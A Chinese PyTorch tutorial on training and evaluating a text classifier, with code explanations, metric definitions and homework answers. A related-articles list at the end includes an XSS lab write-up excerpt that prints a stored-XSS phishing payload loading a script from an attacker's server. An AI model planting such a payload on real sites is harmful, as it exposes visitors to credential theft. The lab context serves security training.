pytorch文本分类(四)模型框架(模型训练与验证)

news2025/1/11 19:58:17

关卡四 模型训练与验证

本文是在原本闯关训练的基础上总结得来,加入了自己的理解以及疑问解答(by GPT4)

原任务链接

目录

  • 关卡四 模型训练与验证
      • 1. 训练
        • 1.1 构建模型结构
        • 1.2 模型编译
        • 1.3 模型训练
        • 1.4模型超参数调试
      • 2. 推理
        • 2.1 模型准确性评估
        • 2.2 模型可靠性评估
        • 2.3 模型效率评估
      • 3. 作业
        • STEP1: 按照要求填入下方题目结果,填完之后点击运行即可
        • STEP2: 将结果保存为 csv 文件

1. 训练

选定了模型框架后,需要对神经网络模型进行训练,主要有3个步骤:

  1. 构建模型结构
  2. 模型编译
  3. 模型训练

接下来详细介绍这3个步骤。

1.1 构建模型结构

构建模型结构,主要有神经网络结构设计、激活函数的选择、模型权重如何初始化、网络层是否批标准化、正则化策略的设定。
由于在关卡四中介绍了神经网络结构设计和激活函数的选择,这里不过多介绍,下面简单介绍下权重初始化,批标准化和正则化策略。

权重初始化
权重参数初始化可以加速模型收敛速度,影响模型结果。常用的初始化方法有:

  • uniform均匀分布初始化
  • normal高斯分布初始化,需要注意的是,权重不能初始化为0,这会导致多个隐藏神经元的作用等同于1个神经元,无法收敛。

批标准化
batch normalization(BN)批标准化,是神经网络模型常用的一种优化方法。它的原理很简单,即是对原来的数值进行标准化处理:
Image Name
batch normalization在保留输入信息的同时,消除了层与层间的分布差异,具有加快收敛,同时有类似引入噪声正则化的效果。它可应用于网络的输入层或隐藏层,当用于输入层,就是线性模型常用的特征标准化处理。

正则化
正则化是在以(可能)增加经验损失为代价,以降低泛化误差为目的,抑制过拟合,提高模型泛化能力的方法。经验上,对于复杂任务,深度学习模型偏好带有正则化的较复杂模型,以达到较好的学习效果。常见的正则化策略有:dropout,L1、L2、earlystop方法。具体可见序列文章:一文深层解决模型过拟合

1.2 模型编译

模型编译,主要包括学习目标、优化器的设定。
深度学习的目标是极大化降低损失函数,其中包括损失函数的选择,这里不过多介绍。关于优化器的选择,可见文章:一文概览神经网络优化算法

1.3 模型训练

数据集划分
在训练模型前,把数据集分为训练集和测试集(关卡二有提到),如果有调超参数调试的需求,可再对训练集进一步分为训练集和验证集。
① 训练集(training set):用于运行学习算法,训练模型。
② 开发验证集(development set)用于调整模型超参数、EarlyStopping、选择特征等,以选择出合适模型。
③ 测试集(test set)只用于评估已选择模型的性能,但不会据此改变学习算法或参数。

数据划分方案
根据数据样本量进行划分,小样本量可以分为60%训练集,20%验证集,20%测试集,大规模样本集(百万级以上),留1w验证集和1w测试集即可。也可以根据超参数的数量来调整验证集的比例,比如超参数越少,或者容易调整的话,可以减少验证集的比例。

训练次数和迭代
epoch:整个数据集在模型上的训练次数
batch:整个数据集被打包成多个批数据
interation:每跑完一个batch都要更新参数,这个过程就是interation

在训练数据的时候,会发现数据量很大,比如训练数据有1000条,内存无法支持同时跑1000条数据,所以要分批次,因此在关卡二中提到的Dataloader里的batch_size就是一批中的数据条数,设batch_size = 10,把全部的数据都跑一遍之后,一次训练完成,就是完成一次epoch。在此过程中一个epoch需要完成100次迭代interation,才可以把所有的数据跑全。但是把整个数据集放在神经网络上训练一次是不够的,需要把整个数据集放在同一个神经网络上学习很多遍,不断迭代进行梯度下降来优化模型。模型对于样本的拟合情况会从欠拟合到理想拟合状态再到过拟合状态。因此epoch也不是设置的越多越好。

1.4模型超参数调试

模型超参数是什么?

参数和超参数
模型有参数和超参数的区别,在训练过程中学到的参数是参数,二超参数是模型学习不到的,是预先定义的模型参数。这里的模型调参指调整超参数。

参数:就是模型可以根据数据可以自动学习出的变量,应该就是参数。比如,深度学习的权重,偏差等

超参数:就是用来确定模型的一些参数,超参数不同,模型是不同的(这个模型不同的意思就是有微小的区别,比如假设都是CNN模型,如果层数不同,模型不一样,虽然都是CNN模型),超参数一般就是根据经验确定的变量。神经网络模型的超参数是比较多的:数据方面的超参数,如验证集比例、batch size等;模型方面,如单层神经元数、网络深度、选择激活函数类型、dropout率等;学习目标方面,如选择损失函数类型,正则项惩罚系数等;优化算法方面,如选择梯度算法类型、初始学习率等。

常用的超参调试有人工经验调节、网格搜索(grid search或for循环实现)、随机搜索(random search)、贝叶斯优化(bayesian optimization)等方法,方法介绍可见系列文章:一文归纳Ai调参炼丹之法。

#Ps:有用的代码片段可以点击cell右上角🌟号一键收藏哦
#模型训练样例代码
def train(cnn, iterator, optimizer, criteon):
    avg_acc = []
    cnn.train()        #表示进入训练模式
 
    for i, batch in enumerate(iterator):
        pred = cnn(batch.text)                         #torch.Size([128, 2])
        loss = criteon(pred, batch.label.long())       #不加.long()会报错
 
 
        acc = binary_acc(torch.max(pred, dim=1)[1], batch.label)   #计算每个batch的准确率
        avg_acc.append(acc)
 
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
 
    avg_acc = np.array(avg_acc).mean()
    return avg_acc

这段代码提供了一个用于训练神经网络(在这种情况下是一个卷积神经网络,CNN)的基本函数。这是在机器学习或深度学习项目中常见的模式。让我帮你详细解释一下这个函数的每个部分:

  1. 函数定义:

    def train(cnn, iterator, optimizer, criteon):  
    
    • train 函数接受四个参数:
      • cnn: 待训练的卷积神经网络模型。
      • iterator: 数据迭代器,用于遍历训练数据。
      • optimizer: 优化器,用于更新模型的权重。
      • criteon: 损失函数,用于计算预测值和真实值之间的差异。
  2. 初始化准确率列表:

    avg_acc = []  
    
    • 用于存储每个批次的准确率。
  3. 设置模型为训练模式:

    cnn.train()  
    
    • 在训练模式下,某些层(如Dropout和BatchNorm)的行为会有所不同。
  4. 遍历数据迭代器:

    for i, batch in enumerate(iterator):  
    
    • 这个循环遍历训练数据的每个批次。
  5. 前向传播:

    pred = cnn(batch.text)  
    
    • 使用模型对当前批次的数据进行预测。
  6. 计算损失:

    loss = criteon(pred, batch.label.long())  
    
    • 使用损失函数计算预测结果和实际标签之间的差异。
  7. 计算准确率:

    acc = binary_acc(torch.max(pred, dim=1)[1], batch.label)  
    
    • 这里似乎需要定义binary_acc函数,用于计算准确率。
  8. 记录准确率:

    avg_acc.append(acc)  
    
    • 将当前批次的准确率添加到列表中。
  9. 反向传播和优化:

    optimizer.zero_grad()  
    loss.backward()  
    optimizer.step()  
    
    • zero_grad清除过去的梯度。
    • loss.backward()计算当前梯度。
    • optimizer.step()更新模型的权重。
  10. 计算平均准确率:

avg_acc = np.array(avg_acc).mean()  
  • 在所有批次结束后,计算平均准确率。

需要注意的是,这段代码中有几个潜在的问题和不明确的地方:

  • binary_acc函数没有在这段代码中定义。它应该是一个计算二分类准确率的函数。
  • batch.textbatch.label的具体结构依赖于数据的格式和迭代器的实现。
  • 这段代码专门用于处理二分类问题。如果要处理多分类问题,可能需要进行一些修改。

2. 推理

推理,指系统性地对模型的准确性、可靠性、效率进行评估。针对分类和回归问题,有不同的模型评估指标。

2.1 模型准确性评估

针对分类问题有混淆矩阵、准确率(accuracy)、精确率(precision)、召回率(recall)、F1 score、ROC、AUC、PR曲线这些指标。

混淆矩阵
混淆矩阵是监督学习中的一种可视化工具,主要用于比较二分类结果和实例的真实信息。矩阵中的每一行代表实例的预测类别,每一列代表实例的真实类别。对于分类算法,比如分类猫和狗。在混淆矩阵中,T(True) 就是预测类别和真实类别一致,F(False) 就是预测类别和真实类别不一致;预测值为正例(Positive),预测值为负例(Negative)。
Image Name

准确率(accuracy):正确分类的样本个数占总样本个数, accuracy = (TP+TN)/(P+N)

精确率(precision):预测正确的正例数据占预测为正例数据的比例,precision = TP/(TP+FP)

召回率(recall):预测为正确的正例数据占实际为正例数据的比例,recall = TP/(TP+FN)

F1 值(F1 score):精确率和召回率的调和平均。F1认为精确率和召回率同等重要。F1-Score的值在0到1之间,越大越好。
计算公式为:F1 = (2 × precision × recall)/(precision + recall)

ROC:采用不分类阈值时的TPR(真正例率)与FPR(假正例率)围成的曲线,以FPR为横坐标,TPR为纵坐标。如果 ROC 是光滑的,那么基本可以判断没有太大的overfitting(过拟合)。
TPR=TP/(TP+FN),代表分类器预测的正类中实际正实例占所有正实例的比例。
FPR=FP/(FP+TN),代表分类器预测的正类中实际负实例占所有负实例的比例,FPR越大,预测正类中实际负类越多。

AUC:计算从(0, 0)到(1, 1)之间整个ROC曲线一下的整个二维面积,用于衡量二分类问题其机器学习算法性能的泛化能力。其另一种解读方式可以是模型将某个随机正类别样本排列在某个随机负类别样本之上的概率。

PR曲线:横轴召回率,纵轴精确率。综合评价整体结果的评估指标。

# 模型推理样例代码 

def eval(data_iter, model):
    print("Start evaluating ...")
    model.eval() #模型评估

    corrects, avg_loss = 0, 0
    for batch in data_iter:
        feature, target = batch.text, batch.label
        feature.data.t_(), target.data.sub_(1)  # batch first, index align

        logit = model(feature)
        loss = F.cross_entropy(logit, target, size_average=False)

        avg_loss += loss.data.item()
        corrects += (torch.max(logit, 1)[1].view(target.size()).data == target.data).sum()

    size = len(data_iter.dataset)
    avg_loss /= size
    accuracy = 100.0 * corrects/size
    print('Evaluation - loss: {:.6f}  acc: {:.4f}%'.format(avg_loss, accuracy))
    print("Evaluating finished.")
    return accuracy


这个eval函数是用来评估一个训练好的模型的性能的。它接受两个参数:data_iter,一个用于提供评估数据的迭代器;model,即待评估的模型。这个函数按批次处理数据,计算模型在整个数据集上的平均损失和准确率。让我们逐步解析这个函数:

  1. 设置模型为评估模式:

    model.eval()  
    
    • 在评估模式下,所有特定于训练的层(如Dropout)将被设置为不活动。
  2. 初始化损失和正确预测的计数:

    corrects, avg_loss = 0, 0  
    
    • corrects用于记录正确预测的样本数,avg_loss用于累积损失值。
  3. 遍历评估数据:

    for batch in data_iter:  
    
    • 这个循环遍历评估数据的每个批次。
  4. 获取特征和目标标签:

    feature, target = batch.text, batch.label  
    
    • feature是模型的输入数据,target是对应的真实标签。
  5. 调整数据维度和标签:

    feature.data.t_(), target.data.sub_(1)  
    
    • 这部分代码对数据进行了转置和标签调整,具体行为取决于数据的格式和模型的需求。
  6. 模型推理:

    logit = model(feature)  
    
    • 使用模型对特征进行推理,得到预测结果。
  7. 计算损失:

    loss = F.cross_entropy(logit, target, size_average=False)  
    
    • 计算预测结果和真实标签之间的交叉熵损失。
  8. 累积损失和正确预测数:

    avg_loss += loss.data.item()  
    corrects += (torch.max(logit, 1)[1].view(target.size()).data == target.data).sum()  
    
    • 将当前批次的损失加入总损失中。
    • 计算当前批次中预测正确的样本数,并累加到corrects中。
  9. 计算总体平均损失和准确率:

    size = len(data_iter.dataset)  
    avg_loss /= size  
    accuracy = 100.0 * corrects / size  
    
    • 计算整个数据集上的平均损失和准确率。
  10. 打印评估结果:

print('Evaluation - loss: {:.6f}  acc: {:.4f}%'.format(avg_loss, accuracy))  
  • 打印出评估过程中的平均损失和准确率。
  1. 返回准确率:
    return accuracy  
    
    • 函数返回计算得到的准确率。

需要注意的是,这个函数适用于处理分类问题,并且假设数据以特定的方式被组织和处理。另外,F.cross_entropy需要从torch.nn.functional中导入。此外,这个函数也假定了数据集的大小可以通过len(data_iter.dataset)获取。您的数据和模型的具体情况可能需要对这个函数进行一些调整。

2.2 模型可靠性评估

可靠性指在规定的条件下和规定的时间内,深度学习算法正确完成预期功能,且不引起系统失效或异常的能力。
可靠性评估指确定现有深度学习算法的可靠性所达到的预期水平的过程。

2.3 模型效率评估

在给定的软硬件环境下,深度学习算法对给定的数据进行运算并获得结果所需要的时间。

3. 作业

STEP1: 按照要求填入下方题目结果,填完之后点击运行即可
  1. 用test.ipnyb跑代码,预测’sorry hate you’是负面的意思还是正面的意思(0为负面意思,1为正面意思)
answer_1 = '0'     #答案放入引号内
  1. 用test.ipnyb训练,预测’he likes baseball’是负面的意思还是正面的意思(0为负面意思,1为正面意思)
answer_2 = '1'     #答案放入引号内
STEP2: 将结果保存为 csv 文件

csv 需要有两列,列名:id、answer。其中,id列为题号,从作业1开始到作业2来表示。answer 列为各题你得出的答案选项。

import pandas as pd # 这里使用下pandas,来创建数据框
answer=[answer_1,answer_2]
 
answer=[x.upper() for x in answer]
dic={"id":["作业"+str(i+1) for i in range(2)],"answer":answer}
df=pd.DataFrame(dic)
df.to_csv('answer5.csv',index=False, encoding='utf-8-sig')
df
idanswer
0作业10
1作业21

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1687752.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

UDP协议与TCP协议1.2

UDP UDP数据报UDP报头UDP载荷 UDP的报文格式: 这里的UDP长度,描述了整个UDP数据报,占多少个字节,这里整个UDP长度最多是64kb 在UDP中校验和就是使用CRC的方式来完成的 数据在网络传输中是可能会出现错误的,例如比特翻…

四信云-设备维保管理系统上线,实现设备全生命周期管理

在当今的制造业中,设备是企业生产的核心要素,是企业竞争力的基石。 随着企业发展规模不断扩大,设备数量急速增长,传统的手工管理方式已经无法满足企业需求,设备管理系统的出现则填补了市场需求空白,其目标…

翻译《The Old New Thing》- How do I mark a shortcut file as requiring elevation?

How do I mark a shortcut file as requiring elevation? - The Old New Thing (microsoft.com)https://devblogs.microsoft.com/oldnewthing/20071219-00/?p24103 Raymond Chen 2007年12月19日 如何将快捷方式标记为需要提升权限 简要 文章介绍了如何通过设置SLDF_RUNAS_US…

echarts-坐标轴2

刻度的间隔 类目轴的间隔 interval xAxis: {type: "category",name: "x轴",axisLine: {},axisLabel: {show: true,color: "yellow",backgroundColor: "blue",interval: 5,},data: [11, 22, 322, 422, 522, 622, 722, 822, 229, 1220,…

k8s集群安装后CoreDNS 启动报错plugin/forward: no nameservers found

安装k8s过程中遇到的问题: 基本信息 系统版本:ubuntu 22.04 故障现象: coredns 报错:plugin/forward: no nameservers found 故障排查: #检查coredns的配置,发现有一条转发到/etc/resolv.conf的配置…

哪些类型的产品适合用3D形式展示?

随着3D技术的蓬勃发展,众多品牌和企业纷纷投身3D数字化浪潮,将产品打造成逼真的3D模型进行展示,消费者可以更加直观地了解产品的特点和优势,从而做出更明智的购买决策。 哪些产品适合3D交互展示? 产品3D交互展示具有直…

云计算事件响应优秀实践

云计算如今已经成为一种主流技术,随着云安全的日益普及,他们正在与德迅云团队合作,致力于开始保护其云计算系统。 云计算如今已经成为一种主流技术,几乎所有组织都在公有云中运行一些资源——无论是网站、游戏、app、小程序。德迅…

钡铼BL205分布式IO在精密机械加工自动化中的精准控制OPC UA

随着工业自动化技术的不断发展,精密机械加工领域对于高效、精准的控制需求日益增加。在这一背景下,钡铼BL205分布式IO的出现为精密机械加工自动化注入了新的活力和可能性。本文将探讨钡铼BL205分布式IO在精密机械加工自动化中的应用,尤其是其…

LeetCode算法题:42. 接雨水(Java)

题目描述 给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。 示例 1: 输入:height [0,1,0,2,1,0,1,3,2,1,2,1] 输出:6 解释:上面是由数组 [0,1,0,2,1,0,1,3…

c4d云渲染是工程文件会暴露吗?

在数字创意产业飞速发展的今天,C4D云渲染因其高效便捷而备受欢迎。然而,随着技术应用的深入,人们开始关注一个核心问题:在享受云渲染带来的便利的同时,C4D工程文件安全吗?是否会有暴露的风险?下…

企业微信主体机构如何修改?

企业微信变更主体有什么作用? 做过企业运营的小伙伴都知道,很多时候经常会遇到现有的企业需要注销,切换成新的企业进行经营的情况,但是原来企业申请的企业微信上面却积累了很多客户,肯定不能直接丢弃,所以这…

【安装笔记-20240523-Windows-安装测试 ShareX】

安装笔记-系列文章目录 安装笔记-20240523-Windows-安装测试 ShareX 文章目录 安装笔记-系列文章目录安装笔记-20240523-Windows-安装测试 ShareX 前言一、软件介绍名称:ShareX主页官方介绍 二、安装步骤测试版本:16.1.0下载链接功能界面 三、应用场景屏…

Jenkins安装 :AWS EC2 Linux

1 JDK11 install # 用的yum安装 # 压缩包安装,下载的jdk-11.0.22_linux-x64_bin.tar.gz在EC2解压,配置环境变量,运行jenkins的时候会报错$ yum -y list java-11* Available Packages java-11-amazon-corretto-devel.x86_64 …

STM32_HAL_RTC时钟

1. RTC 时钟简介 STM32F407 的实时时钟(RTC)是一个独立的定时器。 STM32 的 RTC 模块拥有一组连续计数的计数器,在相对应的软件配置下,可提供时钟日历的功能。修改计数器的值可以重新设置系统的当前时间和日期。 RTC 模块和时钟配…

antd-vue a-tree 当两个不同一级下二级key相同的时候就会导致两个同时选择, 拿到node.parent的数据也会出问题, 解决办法

一、问题如下图: 当两个不同一级下二级key相同的时候就会导致两个同时选择, 同时拿到node.parent的数据也会出问题, 出现一下问题的原因是因为数据treeData 的key出现相同的了 然后如下图、因为我的查询条件 第二层是给 cloud , 第二层是给 relatedPool…

1、pikachu靶场之xss钓鱼复现

一、复现过程 1、payload <script src"http://127.0.0.1/pkxss/xfish/fish.php"></script> 将这段代码插入到含有储存xss的网页上&#xff0c;如下留言板 2、此时恶意代码已经存入数据库&#xff0c;并存在网页中&#xff0c;当另一个用户打开这个网页…

WPF中快速使用iconfont中的icon图标资源

在WPF开发中经常需要用到Icon图标&#xff0c;我们这用用的是Iconfont网站查找icon的资源&#xff0c;本文讲如何把iconfont图标资源当成字体文件导入到WPF程序中使用。 查找打包资源 1.在Iconfont官网查找资源 根据自己需要查找&#xff0c;资源然后添加到购物车 https://…

windows Oracle 11g服务器端和客户端安装 SQLark连接ORACLE

1 从ORACLE官网下载数据库安装包 https://edelivery.oracle.com/osdc/faces/SoftwareDelivery 2:安装数据库 注意&#xff1a;在加载组件的这一步&#xff0c;如果你的电脑里面有杀毒软件&#xff0c;首先把安装目录加入白名单&#xff0c;要不然可能会一直加载组件失败。…

netdiscover一键收集子网内的所有信息(KALI工具系列六)

目录 1、KALI LINUX简介 2、netdiscover工具简介 3、在KALI中使用netdiscover 3.1 目标主机IP&#xff08;win&#xff09; 3.2 KALI的IP 4、命令示例 4.1 扫描子网整个网段 4.2 指定网卡进行扫描 4.3 扫描网卡的公共网络 4.4 快速扫描网卡的公共lan地址 4.5 设置…

echart指定坐标markline

效果如图&#xff1a; 测试代码&#xff0c;可以直接黏贴到echart测试页面中 https://echarts.apache.org/examples/zh/editor.html?cline-simple option {xAxis: {type: value,data: [1, 2, 3, 4, 6, 8, 10]},yAxis: {type: value},series: [{data: [5, 5, 5, null, 6, 6…